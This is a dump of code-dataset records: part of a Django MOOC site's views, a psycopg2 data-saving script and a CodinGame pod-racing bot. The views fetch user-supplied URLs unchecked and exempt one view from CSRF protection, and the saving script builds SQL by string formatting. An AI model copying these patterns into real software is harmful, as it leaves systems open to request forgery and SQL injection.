section_cnt\n quizstore.studystatus = studystatus\n else:\n quizstore = result[0]\n quizstore.visit = True\n quizstore.save()\n # 更新last_section\n studystatus.last_section = max(int(studystatus.last_section), int(section.total_counter))\n studystatus.save()\n return ren2res('./course/study.html', request, {'section': section, 'video': video, 'pdf': pdf,\n 'course': course, 'units': units, 'obj_unit': obj_unit,\n 'usernote':usernote,'course_id':course_id,'unit_cnt':unit_cnt})\n\n\ndef study_index(request, cid):\n course = Course.objects.get(id=cid)\n units = course.units.all().order_by('counter')\n user = request.user\n studystatus = 
StudyStatus.objects.get(course=course, user=user)\n if studystatus.course_time.begin_time == course.cur_time.begin_time:\n finished = False\n else:\n finished = True\n unit = []\n for i in range(1, len(units) + 1):\n # print(len(studystatus.teststore.filter(unit_counter=i)))\n unit.append([course.units.get(counter=i), studystatus.teststore.filter(unit_counter=i)])\n last_section_cnt = int(studystatus.last_section)\n # 未开始学习\n if last_section_cnt == 0:\n last_section_cnt = 1\n next_section_cnt = 1\n last_section = course.sections.all().get(total_counter=last_section_cnt)\n next_section = course.sections.all().get(total_counter=next_section_cnt)\n return ren2res('./course/study_index.html', request,\n {'course': course, 'units': unit, 'studystatus': studystatus, 'last_section': last_section,\n 'next_section': next_section, 'finished': finished})\n last_section = course.sections.all().get(total_counter=last_section_cnt)\n next_section_cnt = last_section_cnt + 1\n if next_section_cnt > len(course.sections.all()):\n next_section_cnt = len(course.sections.all())\n next_section = course.sections.all().get(total_counter=next_section_cnt)\n return ren2res('./course/study_index.html', request,\n {'course': course, 'units': unit, 'studystatus': studystatus, 'last_section': last_section,\n 'next_section': next_section, 'finished': finished})\n\n\n@login_required\ndef take_course(request):\n try:\n course_id = request.GET.get('cid')\n course = Course.objects.get(id=course_id)\n time_id = request.GET.get('tid')\n time = CourseTime.objects.get(id=time_id)\n user = request.user\n result = StudyStatus.objects.filter(course=course, user=user)\n if len(result) >= 1:\n # 此处询问用户是否删除记录重新选课\n result[0].delete()\n print('chongxinxuanke')\n # 此处不重定向,直接继续进行下方的Studystatus的新建过程。\n # return HttpResponseRedirect('/course/' + str(course_id), request)\n except:\n raise Http404\n if len(StudyStatus.objects.filter(course=course, user=user)) == 0:\n studystatus = StudyStatus()\n studystatus.course = course\n studystatus.user = user\n studystatus.course_time = time\n studystatus.save()\n else:\n raise Http404\n return HttpResponseRedirect('/course/' + str(course_id), request)\n\n\n@login_required\ndef take_quiz(request, course_id, unit_cnt, section_cnt):\n try:\n course = Course.objects.get(id=course_id)\n user = request.user\n quiz = course.units.all().get(counter=unit_cnt).sections.all().get(counter=section_cnt).quiz\n result = StudyStatus.objects.filter(course=course, user=user)\n if len(result) == 0:\n return HttpResponseRedirect('/')\n studystatus = result[0]\n except Exception:\n print('error1')\n raise Http404\n question = quiz.questions.all()\n questions = []\n for item in question:\n questions.append(item)\n if request.method == 'GET':\n try:\n quizstore = studystatus.quizstore.all().filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(quizstore) == 1:\n # 用户之前做过这个quiz,要提取出答案传回html\n quizstore = quizstore[0]\n Answer = list(quizstore.Answer)\n for num in range(0, len(Answer)):\n questions[num].user_answer = Answer[num]\n # ......\n else:\n # 不存在quizstore\n # 为用户创建quizstore\n quizstore = QuizStore(studystatus=studystatus, unit_counter=unit_cnt, section_counter=section_cnt)\n quizstore.save()\n Answer = []\n # 按照之前的写就可以了\n # ....\n return ren2res('./course/quiz.html', request,\n {'Question': question, 'Answer': Answer, 'course_id': course_id, 'unit_cnt': unit_cnt,\n 'section_cnt': section_cnt})\n except Exception:\n print('error2')\n raise Http404\n elif request.method == 'POST':\n try:\n # 
得到用户上传的并进行处理,记得把原来的删除,新修改的save\n if ''.join(request.POST.get('DoQuiz').split()) == 'Redo':\n Answer = []\n else:\n studystatus = result[0]\n quizstores = studystatus.quizstore.all().filter(unit_counter=unit_cnt, section_counter=section_cnt)\n quizstore = quizstores[0]\n judge = question.filter(question_type='0') # 获取quiz中的判断题\n option = question.filter(question_type='1') # 获quiz中的取选择题\n Answer = []\n # 以下两个for循环用于获取用户答案\n #将选择题答案存入Answer\n for num in range(0, len(option)):\n if request.POST.get('option' + str(num)) == None:\n Answer.append(' ')\n questions[num].user_answer = ''\n else:\n Answer.append(request.POST.get('option' + str(num)))\n questions[num].user_answer = Answer[num]\n #将判断题答案存入Answer\n print(Answer)\n offset = len(option)\n for num in range(0, len(judge)):\n if request.POST.get('judge' + str(num + offset)) == None:\n Answer.append(' ')\n questions[num + offset].user_answer = ''\n else:\n Answer.append(request.POST.get('judge' + str(num + offset)))\n questions[num + offset].user_answer = Answer[num + offset]\n quizstore.Answer = ''.join(Answer)\n quizstore.save()\n return ren2res('./course/quiz.html', request,\n {'Question': questions, 'Answer': Answer, 'course_id': course_id, 'unit_cnt': unit_cnt,\n 'section_cnt': section_cnt})\n except Exception:\n raise Http404\n else:\n return HttpResponseRedirect('/')\n\n@csrf_exempt\n@login_required\ndef take_test(request, course_id, unit_cnt, test_counter):\n # 当test_counter=0时,自动分配合适的test_counter\n print('test' + str(test_counter))\n if True:\n # try:\n course = Course.objects.get(id=course_id)\n user = request.user\n unit = course.units.get(counter=unit_cnt)\n unit_test = unit.test\n # -----------------------------------------------2\n max_submit_times = unit_test.max_submit_times\n last_time = unit_test.last_time\n # -----------------------------------------------2\n result = StudyStatus.objects.filter(user=user, course=course)\n studystatus = result[0]\n # except Exception:\n # raise Http404\n question = unit_test.test_content.questions.all()\n questions = []\n testscore = 0\n answer = []\n if int(test_counter) == 0:\n result = studystatus.teststore.all()\n test_counter = len(result) + 1\n print('test' + str(test_counter))\n # -----------------------------------------------3\n if int(test_counter) > int(max_submit_times):\n return HttpResponseRedirect('/')\n #-----------------------------------------------3\n if request.method == 'GET':\n try:\n teststore = studystatus.teststore.filter(unit_counter=unit_cnt, test_counter=test_counter)\n if len(teststore) == 1: #用户做过该test,查看该test\n teststore = teststore[0]\n questions_id = (teststore.question_id).split(',')[:len(teststore.question_id) / 2]\n print(questions_id)\n for i in questions_id:\n if i != '': #根据题目数目不同,question_id最后一个值可能为'',需要除去\n questions.append(question.get(counter=int(i)))\n questions.sort(key=lambda x: x.question_type)\n answer = list(teststore.Answer)\n for j in range(0, len(answer)):\n questions[j].user_answer = answer[j]\n testscore = teststore.score\n else: #teststore不存在,用户第一次做test\n #用于保存题目的编号\n print('not exist')\n questions_id = ''\n while ( len(questions) < ( len(question) * 2 / 3 ) ): #随机抽取数量2/3的题目\n a = random.randint(1, len(question))\n if question.get(counter=a) in questions:\n continue\n else:\n questions.append(question.get(counter=a))\n questions_id += (str(a) + ',')\n #建立一个teststore存储题目\n teststore = TestStore(unit_counter=unit_cnt, test_counter=test_counter, studystatus=studystatus,\n question_id=questions_id, score=0, 
submit_time=datetime.date.today())\n teststore.save()\n #调整题目顺序,判断在前,选择在后\n questions.sort(key=lambda x: x.question_type)\n return ren2res('./course/test.html', request,\n {'Questions': questions, 'Answer': answer, 'TestScore': testscore, 'course_id': course_id,\n 'unit_cnt': unit_cnt, 'test_counter': test_counter})\n except Exception:\n raise Http404\n elif request.method == 'POST':\n #用户提交答案\n try:\n #必定有teststore存在\n teststore = studystatus.teststore.get(unit_counter=unit_cnt, test_counter=test_counter)\n questions_id = (teststore.question_id).split(',')[:len(teststore.question_id) / 2]\n for i in questions_id:\n if i != '':\n questions.append(question.get(counter=int(i)))\n questions.sort(key=lambda x: x.question_type)\n judge = []\n option = []\n #获取不同类型题目的数量\n for item in questions:\n if item.question_type == '0':\n judge.append(item)\n elif item.question_type == '1':\n option.append(item)\n #以下两个for循环用于获取用户答案\n #将选择题答案存入Answer\n for num in range(0, len(judge)):\n if request.POST.get('judge' + str(num)) == None:\n answer.append(' ')\n questions[num].user_answer = ''\n else:\n answer.append(request.POST.get('judge' + str(num)))\n questions[num].user_answer = answer[num]\n #将判断题答案存入Answer\n offset = len(judge)\n for num in range(0, len(option)):\n if request.POST.get('option' + str(num + offset)) == None:\n answer.append(' ')\n questions[num + offset].user_answer = ''\n else:\n answer.append(request.POST.get('option' + str(num + offset)))\n questions[num + offset].user_answer = answer[num + offset]\n #------------------------------------------------------------------------\n if datetime.date.today() <= last_time:\n #计算得分\n #在提交时间内保存题目分数,逾期不保存\n for i in range(0, len(answer)):\n if answer[i] == questions[i].answer:\n testscore += questions[i].question_score\n teststore.Answer = ''.join(answer)\n teststore.score = testscore\n teststore.save()\n else:\n #逾期不保存任何信息\n teststore.delete()\n return ren2res('./course/test.html', request,\n {'Questions': questions, 'Answer': answer, 'TestScore': testscore, 'course_id': course_id,\n 'unit_cnt': unit_cnt, 'test_counter': test_counter})\n except:\n raise Http404\n else:\n return HttpResponseRedirect('/')\n\n\n@login_required\ndef member(request):\n if request.method == 'GET':\n user = request.user\n result = StudyStatus.objects.filter(user=user)\n course_in = []\n course_out = []\n for studystatus in result:\n course = studystatus.course\n if studystatus.course_time.begin_time == course.cur_time.begin_time:\n units = course.units.all()\n deltadays = int((datetime.date.today() - course.cur_time.begin_time).days)\n for unit in units:\n deltadays = deltadays - int(unit.gap_days)\n if deltadays <= 0:\n process_num = int(float(unit.counter)/float(len(units))*100)\n print(process_num)\n course_in.append([course, process_num])\n break\n else:\n course_out.append([course, studystatus.course_time.begin_time])\n return ren2res('./user/personal.html', request, {'course_in': course_in, 'course_out': course_out})\n\n\ndef get_file(request):\n url = str(request.GET.get('url'))\n f = urllib2.urlopen(url)\n data = f.read()\n response = FileResponse(data)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"test.pdf\"'\n return response\n\n\ndef download(request):\n url = str(request.GET.get('url'))\n name = request.GET.get('name')\n f = urllib2.urlopen(url)\n data = f.read()\n response = FileResponse(data)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 
'attachment;filename=\"'+name+'.pdf\"'\n print(name)\n return response\n\n\n\n@login_required\ndef ttt(request):\n if not request.user.has_perm('Mooc.can_change_user'):\n raise Http404\n STORAGE_URL='http://moockitchen-mooc.stor.sinaapp.com/'\n if request.method == 'GET':\n return ren2res('ttt.html', request, {})\n else:\n content = request.FILES['file1']\n online = environ.get(\"APP_NAME\", \"\")\n if online:\n import sae.const\n access_key = sae.const.ACCESS_KEY\n secret_key = sae.const.SECRET_KEY\n appname = sae.const.APP_NAME\n domain_name = \"mooc\"\n import sae.storage\n\n s = sae.storage.Client()\n ob = sae.storage.Object(content.read())\n type = str(request.POST.get('type'))\n subtype = str(request.POST.get('subtype'))\n if type == 'section':\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n unit_id = request.POST.get('unit_id')\n unit = course.units.all().get(counter=unit_id)\n section_id = request.POST.get('section_id')\n section = unit.sections.all().get(counter=section_id)\n dir = str(subtype)+'/'+str(course_id)+'_'+str(unit_id)+'_'+str(section_id)\n if subtype == 'pdf':\n section.pdf = STORAGE_URL+dir\n elif subtype == 'video':\n section.video = STORAGE_URL+dir\n else:\n raise Http404\n section.save()\n elif type == 'img':\n if subtype == 'course':\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n dir = str(type)+'/'+str(subtype)+'/'+str(course_id)\n course.img = STORAGE_URL+dir\n course.save()\n elif subtype == 'user':\n user_id = request.POST.get('user_id')\n user = User.objects.get(id=user_id)\n userinfo = user.info\n dir = str(type)+'/'+str(subtype)+'/'+str(user_id)\n userinfo.img = STORAGE_URL+dir\n userinfo.save()\n elif subtype == 'problem':\n problem_id = request.POST.get('problem_id')\n problem = QuizQuestion.objects.get(id=problem_id)\n dir = str(type)+'/'+str(subtype)+'/'+str(problem_id)+'/summary'\n problem.image = STORAGE_URL+dir\n problem.save()\n elif subtype == 'option':\n problem_id = request.POST.get('problem_id')\n problem = QuizQuestion.objects.get(id=problem_id)\n option_id = str(request.POST.get('option_id'))\n dir = str(type)+'/'+'problem'+'/'+str(problem_id)+'/'+str(option_id)\n if option_id == 'a':\n problem.image_a = STORAGE_URL+dir\n elif option_id == 'b':\n problem.image_b = STORAGE_URL+dir\n elif option_id == 'c':\n problem.image_c = STORAGE_URL+dir\n elif option_id == 'd':\n problem.image_d = STORAGE_URL+dir\n else:\n raise Http404\n problem.save()\n else:\n raise Http404\n elif type == 'serverfile':\n dir = str(request.POST.get('dir'))\n else:\n raise Http404\n url = s.put(domain_name, dir, ob)\n return ren2res('ttt.html', request, {'value': url})\n else:\n return ren2res('ttt.html', request, {'value': 'save failed'})\n\n@login_required\ndef create_message(request):\n servertime = datetime.date.today()\n user = request.user\n course_id = request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n content = request.POST.get('content')\n reference_id = request.POST.get('reference_id')\n if reference_id is None:\n reference_id = -1\n floor_counter = int(len(Message.objects.all().filter(course=course)))+1\n message = Message(user=user, course=course, reference=reference_id, content=content, floor=floor_counter,\n publishTime=servertime)\n message.save()\n return JsonResponse({'message': u'上传成功'})\n\n@login_required\ndef keepnote(request):\n print('innote')\n if request.is_ajax():\n t = loader.get_template('./course/note.html')\n course_id = 
request.POST.get('course_id')\n course = Course.objects.get(id=course_id)\n unit_cnt = request.POST.get('unit_cnt')\n note_content = request.POST.get('content')\n try:\n note = UserNote.objects.get(user_id=request.user.id, course=course, unit_counter=unit_cnt)\n note.content = note_content\n except Exception:\n note = UserNote(course=course, unit_counter=unit_cnt, user_id=request.user.id, content=note_content)\n note.save()\n content_html = t.render(Context({'usernote': note}))\n return HttpResponse(content_html)\n\n@login_required\ndef get_messages(request):\n if request.is_ajax():\n t = loader.get_template('./course/message.html')\n course_id = request.GET.get('course_id')\n course = Course.objects.get(id=course_id)\n messages = course.messages.all().order_by('floor')\n content_html = t.render(Context({'messages': messages}))\n return HttpResponse(content_html)\n\n@login_required\ndef set_likes(request):\n course_id = request.GET.get('course_id')\n course = Course.objects.get(id=course_id)\n user = request.user\n query_result = LikeUserCourse.objects.filter(user=user, course=course)\n if len(query_result) == 0:\n new = LikeUserCourse(user=user, course=course)\n new.save()\n course.likeCounter += 1\n html_data = '+1'\n else:\n old = query_result[0]\n old.delete()\n course.likeCounter -= 1\n html_data = '-1'\n course.save()\n return JsonResponse({'likeCounter': course.likeCounter, 'html_data': html_data})\n\ndef getCourseClass(request):\n # courseclass selects which course category to load\n # number controls how many courses to load\n # Flag tells the template whether a load-more button is needed\n if request.is_ajax():\n t = loader.get_template('courseclass.html')\n courseclass = request.GET.get('content_class')\n search_text = request.GET.get('content_text')\n number = request.GET.get('number')\n if number is None:\n number = 1\n else:\n number = int(number)\n if search_text == \"\" or search_text is None:\n if courseclass == 'all':\n courses = list(Course.objects.all()[0:6 * number])\n if Course.objects.all().count() > len(courses):\n Flag = True\n else:\n Flag = False\n else:\n courses = list(Course.objects.filter(courseClass=courseclass)[0:6 * number])\n if Course.objects.filter(courseClass=courseclass).count() > len(courses):\n Flag = True\n else:\n Flag = False\n elif courseclass == \"\":\n courses = list(Course.objects.filter(name__icontains=search_text)[0:6 * number])\n if Course.objects.filter(name__icontains=search_text).count() > len(courses):\n Flag = True\n else:\n Flag = False\n courses_num = []\n for i in range(0, len(courses)):\n if (i + 1) % 3 == 1:\n courses_num.append([courses[i], 0])\n elif (i + 1) % 3 == 2:\n courses_num.append([courses[i], -1])\n else:\n courses_num.append([courses[i], 1])\n number = number + 1\n if search_text == \"\" or search_text is None:\n content_html = t.render(Context({'courses_num': courses_num, 'courseclass': courseclass, 'number': number, 'Flag': Flag}))\n elif courseclass == \"\":\n content_html = t.render(Context({'courses_num': courses_num, 'search_text': search_text, 'number': number, 'Flag': Flag}))\n return HttpResponse(content_html)\n\ndef search(request):\n # if request.is_ajax():\n # t = loader.get_template('./course/search.html')\n data = request.GET.get('search_text')\n courses = list(Course.objects.filter(name__icontains=data)[0:6])\n if Course.objects.filter(name__icontains=data).count() > len(courses):\n Flag = True\n else:\n Flag = False\n search_text = data\n print(search_text)\n number = 2\n courses_num = []\n for i in range(0, len(courses)):\n if (i + 1) % 3 == 1:\n courses_num.append([courses[i], 0])\n elif (i + 1) % 3 == 2:\n courses_num.append([courses[i], -1])\n else:\n 
courses_num.append([courses[i], 1])\n # content_html = t.render(Context({{'courses_num': courses_num,'courseclass':courseclass,\n # 'number':number,'Flag':Flag,}}))\n print(\"Hello++++++++++++++\")\n # return HttpResponse(content_html)\n return ren2res('./course/search.html', request, {'courses_num': courses_num, 'search_text': search_text,\n 'number': number, 'Flag': Flag})\n","sub_path":"Mooc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"111262454","text":"import psycopg2\nfrom datetime import datetime\nfrom db_connect import db_conn_fn\n\n\n\n\nconn = db_conn_fn()\nc = conn.cursor()\n\n\ndef save_data(utc,askp,bidp,askv,bidv,curr):\n\n try:\n c.execute(\"INSERT INTO data2 (utc,askprice, bidprice, askvolume,bidvolume, currency) VALUES ('%s','%s','%s','%s','%s','%s')\"%(utc,askp,bidp,askv,bidv,curr))\n conn.commit()\n except Exception as e:\n print('error while saving raw data')\n print(str(e))","sub_path":"fat/old/to_prod3/data_saving.py","file_name":"data_saving.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"577908926","text":"import sys\nimport math\nimport cmath\n\n# game loop\nthrust_def = 100\nthrust_zero = 0\nboost_used = 0\n\ndef circle_point(check_x, check_y, angle, radius):\n center = [ check_x, check_y]\n from math import cos, sin, pi\n circ_x = center[0] + (radius * cos(angle))\n circ_y = center[1] + (radius * sin(angle))\n return circ_x, circ_y\n\ndef my_vector (chpnt, my_loc):\n difference = [ my_loc[0] - chpnt[0], my_loc[1] - chpnt[1] ]\n pod_vec = math.sqrt(float(difference[0]**2) + float(difference[1]**2))\n return int(pod_vec)\n\ndef ene_vector (chpnt, ene_loc):\n difference = [ ene_loc[0] - chpnt[0], ene_loc[1] - chpnt[1] ]\n ene_vec = math.sqrt(float(difference[0]**2) + float(difference[1]**2))\n return int(ene_vec)\n\n\ndef calc_nchp (chpnt_x, chpnt_y):\n if chpnt_x > chpnt_y:\n chpnt_x = int(chpnt_x - 187)\n elif chpnt_y < 810 and chpnt_x > chpnt_y:\n chpnt_y = int(chpnt_y + 140)\n chpnt_x = int(chpnt_x)\n else:\n chpnt_y = int(chpnt_y - 187)\n return chpnt_x, chpnt_y\n \n\n\nnum_chp = 0\nturn = 0\nwhile True:\n # Write an action using print\n # To debug: print(\"Debug messages...\", file=sys.stderr)\n # You have to output the target position\n # followed by the power (0 <= thrust <= 100)\n # next_checkpoint_x: x position of the next check point\n # next_checkpoint_y: y position of the next check point\n # next_checkpoint_dist: distance to the next checkpoint\n # next_checkpoint_angle: angle between your pod orientation and the direction of the next checkpoint\n x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]\n opponent_x, opponent_y = [int(i) for i in input().split()] \n ## my variables\n nch_y = next_checkpoint_y\n nch_x = next_checkpoint_x\n nch_angle = next_checkpoint_angle\n nch_dist = next_checkpoint_dist\n ene_x = opponent_x\n ene_y = opponent_y\n enemy_loc = [ ene_x, ene_y ]\n moje_loc = [ x, y ]\n nch_loc = [ nch_x, nch_y ]\n last_check = nch_loc\n \n # count vectors mine and enemy's\n EPOD_VECTOR = ene_vector(nch_loc, enemy_loc)\n POD_VECTOR = my_vector(nch_loc, moje_loc)\n \n #vypocitej upravene souradnice dalsiho checkpointu\n nch_loc = calc_nchp(nch_x, nch_y) \n [x+1000 for x in nch_loc]\n \n# pocitani a pohyb bota\n while moje_loc[0] >= nch_loc[0] or moje_loc[1] >= nch_loc[1]: #dokud nejsou x nebo y stejne nebo vetsi\n thrust = int(thrust_def * (nch_dist/1650)) #uprav rychlost dle vzdalenosti\n if thrust >= 100: # korekce kvuli maximu rychlosti\n thrust = thrust_def \n nch_loc = calc_nchp(nch_x, nch_y) #spocitej souradnice dalsiho checkpointu\n [x+1000 for x in nch_loc] # uprav souradnice dalsiho checkpointu\n if nch_dist >= 8500 and nch_angle == 0 and boost_used == 0 and turn >= 1: # BOOST usage\n thrust = \"BOOST\"\n boost_used = 1\n elif EPOD_VECTOR == POD_VECTOR: #boost na kolizni kurz\n thrust = \"BOOST\"\n boost_used = 1 \n print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust)) # zadani kurzu a rychlosti\n break\n else: # zbytek podminky\n if nch_dist >= 8500 and nch_angle == 0 and boost_used == 0 and turn >= 1: #BOOST usage\n thrust = \"BOOST\"\n boost_used = 1\n elif EPOD_VECTOR == POD_VECTOR:\n thrust = \"BOOST\"\n boost_used = 1\n print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust)) #zadani kurzu a rychlosti\n \n \n\n\n #print(str(nch_loc[0]) + \" \" + str(nch_loc[1]) + \" \" + str(thrust))\n turn = int(turn)+1\n num_chp = 
int(num_chp)+1\n\n","sub_path":"last.py","file_name":"last.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}